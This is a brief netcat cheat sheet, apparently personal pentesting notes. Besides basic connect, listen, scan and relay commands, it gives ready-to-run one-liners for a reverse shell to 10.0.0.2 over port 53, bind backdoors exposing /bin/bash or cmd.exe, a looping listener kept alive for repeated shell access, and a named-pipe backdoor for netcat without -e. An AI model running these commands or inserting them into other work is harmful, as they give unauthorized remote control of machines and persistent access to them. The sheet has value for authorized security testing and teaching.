Netcat

Netcat rocks my socks

Basics

Connect to a socket on host 192.168.1.1 on TCP port 81

nc 192.168.1.1 81

Listen on the local machine for inbound TCP connections on port 81

nc -nvlp 81

Reverse shell sent to host 10.0.0.2 over TCP port 53

nc 10.0.0.2 53 -e /bin/bash

Backdoor listening on TCP 80 set to execute cmd.exe when connected

nc -nvlp 80 -e cmd.exe

More Fancy

Attempt to connect to each port from 10-90 on 10.0.0.1, don't resolve any names -n, don't send any data -z, and only wait 1 second for a connection -w1

nc -nvzw1 10.0.0.1 10-90

Netcat stops listening after the connection drops or is terminated, which can make getting another shell back annoying. Placing nc in a bash true loop is an easy way to work around this, use nohup also!

while [ 1 ]; do echo β€œstarted”; nc -l -p 1234 -e /bin/sh; done

Netcat relay used to forward everything received by the host on TCP 4321 sent to 10.0.0.1 on TCP 8123

nc -l -p 4321 | nc 10.0.0.1 8123

Create a netcat backdoor without -e support. This generates a named pipe which is used to funnel data between bash and nc.

mknod backpipe p
/bin/bash 0<backpipe | nc -l -p 8080 1>backpipe